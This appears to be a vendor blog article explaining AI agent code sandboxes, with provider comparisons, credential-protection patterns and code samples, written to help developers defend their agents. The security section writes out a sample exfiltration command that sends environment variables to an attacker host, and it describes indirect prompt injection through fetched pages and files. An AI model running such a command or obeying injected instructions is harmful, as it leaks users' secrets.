Ask any AI to write a function and it will, instantly. Ask it to run that function — install the dependency, fetch a CSV from a URL, plot the result, spot the bug, fix it, and try again — and you've crossed a line the model cannot cross on its own.
The model lives in a chat window. The work happens somewhere else. That "somewhere else" is a sandbox — an isolated, short-lived, fully programmable computer that an AI agent owns for the duration of a task. It is the most important piece of infrastructure in agentic AI, and the most underestimated. Frontier models get the headlines. Sandboxes are the reason those models can actually do things.
This article explains what sandboxes are, why agents cannot function without them, how to think about choosing one, and where the industry is heading. It's written for developers who use AI coding tools — not infrastructure engineers — and every claim is backed by research.
TL;DR. A sandbox gives an AI agent a real computer to work with: a filesystem, a shell, network access, and state that persists across tool calls. Without one, even the smartest model is just a chatbot — it can suggest code but can't verify it. The 2026 market includes managed platforms like Modal (which powers CodingFleet's sandboxes), E2B, Daytona, and Cloudflare, plus self-hosted options like Docker Sandboxes. The right choice depends on what your agent is allowed to touch — and what you can't let it break.
The difference between a chatbot and an agent is a sandbox

A 2023-era chatbot was stateless. You sent text in, the model sent text out. The only "side effect" was the response. There was nothing for the model to do, so it didn't need a place to do it.
That changed when models started being wired to real systems. Once an LLM can write to a file, call an API, or run a command, it stops being a function from prompt to response. It becomes a loop:

1. Plan — look at the goal, decide what to do next.
2. Act — call a tool, run a command, fetch a resource.
3. Observe — read the output, the error, the result.
4. Re-plan — decide what to do next based on what just happened.
Steps 1 and 4 are pure inference. They happen in the model's context window. But steps 2 and 3 need a computer. Specifically, they need five things:
| Property | Why agents need it |
|---|---|
| A real filesystem | Agents write code, save plots, clone repos, edit configs. They need mkdir, cp, git — not key-value blobs in a prompt. |
| A shell | The agent decides to run python train.py or npm install or ffmpeg. It needs a place to run processes. |
| Network access | Fetching data, calling APIs, installing packages — all require outbound connectivity. |
| State persistence | An agent that loses its filesystem between tool calls loops forever. The sandbox keeps state for the life of the task. |
| Isolation | The agent runs code we didn't write, from a model we can't fully control. It must not touch the host or other users. |
Skip any one of these and you don't have an agent. You have a confused chatbot. A model that writes Python but can't execute it is a code reviewer. A model that runs a command but can't see its output is a coin flip. The sandbox is the substrate that turns inference into action.
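The loop above as an added example, not code from the article: a scripted stand-in for the model drives plan / act / observe / re-plan against a throwaway local working directory that only stands in for a sandbox (it keeps files between tool calls, which is the point being illustrated, but offers no isolation at all; a real sandbox is a remote container or microVM reached over an API). The file name, the buggy script and the scripted decisions are constructed.

```python
import pathlib
import subprocess
import sys
import tempfile


class LocalWorkdir:
    """Minimal tool surface a sandbox exposes: write a file, run a command.
    State (the files) persists across calls; this stand-in has NO isolation."""

    def __init__(self):
        self.root = pathlib.Path(tempfile.mkdtemp(prefix="agent-"))

    def write(self, name, text):
        (self.root / name).write_text(text)

    def run(self, *cmd, timeout=30):
        p = subprocess.run(cmd, cwd=self.root, capture_output=True,
                           text=True, timeout=timeout)
        return p.returncode, p.stdout + p.stderr


def scripted_model(history):
    """Stands in for LLM inference: picks the next action from what was observed.
    history is a list of (action, observation) pairs, newest last."""
    if not history:  # constructed first draft that divides by len([]) == 0
        return ("write", "stats.py", "vals = []\nprint(sum(vals) / len(vals))\n")
    action, observation = history[-1]
    if action == "write":
        return ("run", "stats.py")
    if action == "run" and "ZeroDivisionError" in observation:
        # Re-plan from the traceback: patch the file written in an earlier step.
        return ("write", "stats.py",
                "vals = []\nprint(sum(vals) / len(vals) if vals else 0.0)\n")
    return ("done",)


def agent_loop(box, max_steps=6):
    """Run plan -> act -> observe -> re-plan until the model says it is done."""
    history = []
    for _ in range(max_steps):
        step = scripted_model(history)  # plan / re-plan (inference)
        if step[0] == "done":
            return history
        if step[0] == "write":
            box.write(step[1], step[2])  # act: the file outlives this call
            obs = "ok"
        else:
            code, out = box.run(sys.executable, step[1])  # act + observe
            obs = f"exit={code}\n{out}"
        history.append((step[0], obs))
    return history
```

The second run only succeeds because `stats.py` from the earlier write is still there; drop the persistent directory and the model would be patching a file that no longer exists.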
Where you've already seen this. ChatGPT's "Code Interpreter," Claude's file analysis, and Gemini's code execution are all built-in sandboxes. They're why those products can run Python and return charts instead of just suggesting code. The sandboxes we're talking about here are the external kind — the ones that power Cursor's background agents, Devin, Claude Code, and CodingFleet's multi-model chat. They're what you use when you want any model, not just the one in a specific chat product, to have a real computer.
What a sandbox actually is

The word predates AI. It comes from 1990s security engineering: a sandbox is any environment where untrusted code runs without being able to affect anything outside. Java applets, browser tabs, mobile apps — they all run in sandboxes.
An AI code sandbox is the same idea, repurposed for the agent era. It's a Linux machine — usually a container or lightweight VM — that an agent controls through an API. The agent can execute commands, read and write files, make network requests, install packages, and persist state between tool calls. What it can't do is escape into the host, touch other users' data, or survive past its timeout.
The key difference from a regular server: the user is an AI, not a human. There's no terminal, no "OK" button on a permissions dialog, no human reading the error message. The sandbox has to be programmable end-to-end, observable in real time, and recoverable from any state the model wanders into.
The sandbox provider landscape in 2026
The market has consolidated into a handful of well-defined options. Here's what matters for each, at a glance:
| Provider | Best for | Isolation | GPU | Session limit | ~Cost/hr |
|---|---|---|---|---|---|
| Modal | GPU workloads, elastic scale | gVisor | L4→H200 | Unlimited | $0.12 |
| E2B | Strong security, clean SDK | Firecracker µVM | — | 24 hours | $0.08 |
| Daytona | Persistent workspaces | Docker (Kata opt.) | Optional | Unlimited | $0.08 |
| Cloudflare | Edge, fastest cold starts | V8 isolates | — | 30 min | $0.09 |
| Vercel | Already on Vercel | Firecracker µVM | — | 5 hours | $0.15 |
| Northflank | Bring-your-own-cloud | Multi (Firecracker/gVisor/Kata) | L4→H200 | Unlimited | $0.03 |
| Blaxel | Perpetual state, low latency | Custom µVM | — | Unlimited | Contact |
| Docker SB | Local, free, familiar | µVM (per-sandbox) | Host GPU | Configurable | Free |
Pricing from public rate cards as of May 2026. Verify on each provider's site. Sources: vendor docs and Northflank's comparison.
The cold-start picture tells its own story:

[Figure: cold-start latency by provider]

And the fundamental tradeoff every provider faces — stronger isolation costs more:

[Figure: isolation strength against cost per hour, by provider]

The capability profiles show that no provider wins on every axis:

[Figure: capability profile per provider]
Modal wins on GPU and scale. E2B wins on isolation and SDK quality. Cloudflare wins on cold start and edge presence. Blaxel wins on stateful resume latency. Pick the provider that matches your agent's dominant need — not the one with the most blog posts.
The security elephant in the room
An agent that can write code and hit the network can also leak the credentials you gave it. The obvious pattern — os.environ["GITHUB_TOKEN"] — works until a prompt-injected comment on a webpage convinces the model to curl https://attacker.example/leak -d "$(env)". This isn't theoretical: Aikido researchers found 30+ such vulnerabilities in AI coding tools in late 2025.
The defenses, in order of maturity:

1. Scrubbed env vars — set the key, strip it from env and /proc. Stops naive attacks; bypassed by anything clever.
2. Sidecar proxies — a small auth broker sits alongside the sandbox. The agent asks the broker for access; the credential never enters the agent's environment. This is what Infisical's Agent Vault and Anthropic's Claude Code sandboxing use.
3. Short-lived tokens — per-session, per-scope OAuth tokens valid for 15 minutes. If compromised, the window is tiny.
4. Identity-based access — no bearer tokens at all. The agent authenticates as a workload identity. This is where the industry is heading but few have arrived.
The honest state of the art: defenses 1 and 2 are production-ready. Defense 3 is real but operationally heavy. Defense 4 is mostly aspiration. Until identity-based access is the norm, give your agent the minimum credentials for the minimum time.
What sandboxes don't protect against. A sandbox limits blast radius. It doesn't stop a compromised model from exfiltrating data through an allowed endpoint, modifying files, or burning API credits. As Anthropic's engineering team puts it: effective sandboxing requires both filesystem and network isolation, and even then, you need a human in the loop for high-impact actions. Sandboxes are necessary. They are not sufficient.
The single biggest change in the threat model between 2024 and 2026 is the rise of indirect prompt injection. Your agent doesn't just trust the model — it trusts web pages it fetches, GitHub issues, documentation sites, uploaded PDFs, and search results. Any of those can contain instructions the model will follow. Modal, E2B, and the better-managed platforms now support egress allowlists — the sandbox can only talk to approved domains. This is the single most valuable security feature on the market, and the one most often skipped by teams building their own infrastructure.
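To make the sidecar-proxy and egress-allowlist patterns concrete, here is an added example (not code from CodingFleet, Infisical or Anthropic) of the policy a broker applies: the agent's request carries no secret; the broker refuses any destination off the allowlist, including look-alike hosts, and attaches the token only for the host it belongs to. The host names, the allowlist and the placeholder token are assumptions.

```python
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit


@dataclass
class Request:
    method: str
    url: str
    headers: dict = field(default_factory=dict)


# Egress allowlist (constructed): exact hosts, or ".pypi.org" for any subdomain.
ALLOWLIST = {"api.github.com", ".pypi.org"}

# Secrets live only in the broker process, never in the sandbox environment.
BROKER_SECRETS = {"api.github.com": "ghp_PLACEHOLDER_TOKEN"}  # placeholder value


def host_allowed(host: str, allowlist=ALLOWLIST) -> bool:
    """Match on whole labels, so 'api.github.com.attacker.example' is refused."""
    host = host.lower().rstrip(".")
    for entry in allowlist:
        if entry.startswith("."):
            # Suffix match on a label boundary: 'files.pypi.org' yes, 'notpypi.org' no.
            if host == entry[1:] or host.endswith(entry):
                return True
        elif host == entry:
            return True
    return False


def broker_forward(req: Request) -> Optional[Request]:
    """Return the outbound request the broker will send, or None if refused."""
    parts = urlsplit(req.url)
    if parts.scheme != "https" or not parts.hostname:
        return None  # plaintext or malformed destinations are refused
    if not host_allowed(parts.hostname):
        return None  # off the egress allowlist: the agent cannot reach it
    # Drop any Authorization the agent supplied itself, then inject the
    # broker's own secret, and only for the host that secret belongs to.
    headers = {k: v for k, v in req.headers.items()
               if k.lower() != "authorization"}
    token = BROKER_SECRETS.get(parts.hostname)
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return Request(req.method, req.url, headers)
```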
How this works in a product like CodingFleet
Most of the conversation so far has been about infrastructure. Let's pull the camera back to the product layer — because that's where most developers actually encounter a sandbox for the first time.
CodingFleet sits on top of a Modal-powered sandbox and exposes it through a chat interface, but with one architectural twist: the same sandbox is wired to 20+ large language models from OpenAI, Anthropic, Google, Meta, DeepSeek, xAI, Mistral, and Qwen. You can switch between models mid-conversation, and every model gets the same tools: code execution, file upload/download, web search, sub-agents, and parallel execution.
That's the non-obvious part. Normally, a sandbox is married to a single model. By giving every model the same sandbox tools, CodingFleet lets Claude spawn a sub-agent that uses GPT-5.5 to write a function, which Qwen Coder then reviews, while the orchestrator runs the tests. The sandbox is the shared surface area; the models are interchangeable.
The practical workflow: you describe what you want. CodingFleet spawns a sandbox. The model writes a plan, executes it, fetches data from the internet, runs the code, and returns artifacts — charts, PDFs, CSVs, generated code. Drop a GitHub PAT into the prompt and the model commits to your repo. The credential lives only for the session, routed through CodingFleet's proxy, never appearing in the model's context. Same pattern works for any SaaS API.
This is the most natural way to encounter a sandbox in 2026: not as infrastructure you configure, but as a capability the product provides. The user sees "I asked the AI to do a thing, and it did the thing, with files and an internet connection and a real computer behind it."
How to pick a sandbox: a decision tree
Start with one question: what's the worst thing the agent could do?
| Your worst case | What to pick |
|---|---|
| 💰 Billing shock | Cloudflare, Vercel, or E2B free tier. Optimize for cold start and SDK quality. |
| 🔓 Data exfiltration | E2B, Blaxel, or Northflank with BYOC. You need µVM isolation + egress allowlist. Avoid containers. |
| 📋 Regulatory fine | Northflank BYOC or self-hosted Docker Sandboxes. Must run in your own VPC with audit logs. |
| ⏱️ Missing latency SLA | Blaxel (25ms standby resume). E2B and Modal resume paused sandboxes but with longer warm-up. |
| 🧠 Can't do ML work | Modal (default for GPU agents) or Northflank. E2B, Cloudflare, Vercel, and Blaxel don't offer GPUs. |
| 👤 Not building — using | Skip the decision. Use CodingFleet, Cursor, or Devin. The sandbox is a feature, not a choice. |
Where this is going
Three trends to watch:
1. MicroVMs will become the default. Docker's move to microVM isolation in Docker Sandboxes is the most significant shift. For the first time, a developer gets hardware-grade isolation with the familiar docker run workflow. The "container vs VM" debate will look as dated in two years as "VM vs bare metal" looks today.
2. Sandboxes will get their own filesystem. Current sandbox storage is a thin wrapper over block devices. The next generation — see Turso's AgentFS — is purpose-built for agents: filesystem, key-value store, and tool-call history in one SQLite-backed abstraction. An agent that boots into a filesystem that remembers its last session is qualitatively different from one that starts from scratch every time.
3. Credentials will move from runtime to identity. Bearer tokens in environment variables are a 2023 pattern. By 2028, the default will be workload identity: the agent authenticates as itself, and the credential is never a string. Until then, the sidecar proxy pattern is the best we have.
FAQ
What is a code sandbox?
An isolated computer — usually a container or lightweight VM — where an AI agent can execute code, read/write files, and access the network without touching anything outside the boundary.
Why can't my AI just run code on my laptop?
It can, but the model has the same access you do — your files, SSH keys, browser cookies. One prompt injection away from an incident. A sandbox limits the blast radius.
Is ChatGPT's Code Interpreter a sandbox?
Yes — a built-in one. It's a short-lived Linux VM the model owns for the session. Claude's file analysis and Gemini's code execution work the same way.
What's the difference between Modal, E2B, and Daytona?
Modal: serverless, GPU-capable, gVisor isolation, Python-native. E2B: strongest isolation (Firecracker microVMs), cleanest SDK, 24h session cap. Daytona: persistent workspaces that survive between sessions, Docker-based with optional Kata isolation.
How much does running an agent on a sandbox cost?
A typical 1-vCPU, 2 GB RAM sandbox: $0.03–$0.15/hour. A coding session that completes a real task usually burns 5–30 minutes of sandbox time — $0.005–$0.075. The LLM tokens almost always cost more.
Can sandboxes stop prompt injection?
No. A sandbox limits what a compromised model can reach. Egress allowlists, credential proxies, and human-in-the-loop checkpoints are the actual defenses. Sandboxes are the table stakes; the policy on top is the real security.
Sandboxes are the unglamorous foundation of agentic AI. The model is the brain, the prompt is the input, the tools are the limbs — and the sandbox is the body that gives the limbs something to stand on. If you're building, buy from a provider that has thought hard about the isolation layer. If you're using, pick a product that's already made the tradeoffs for you.
Sources & further reading: Firecracker · gVisor · Anthropic: Claude Code Sandboxing · Anthropic: Code execution with MCP · Modal · E2B · Daytona · Northflank pricing comparison · Blaxel · Docker Sandboxes · Infisical Agent Vault · Turso AgentFS · Apiiro: Code execution risks in agentic AI · NVIDIA: Sandboxing agentic workflows.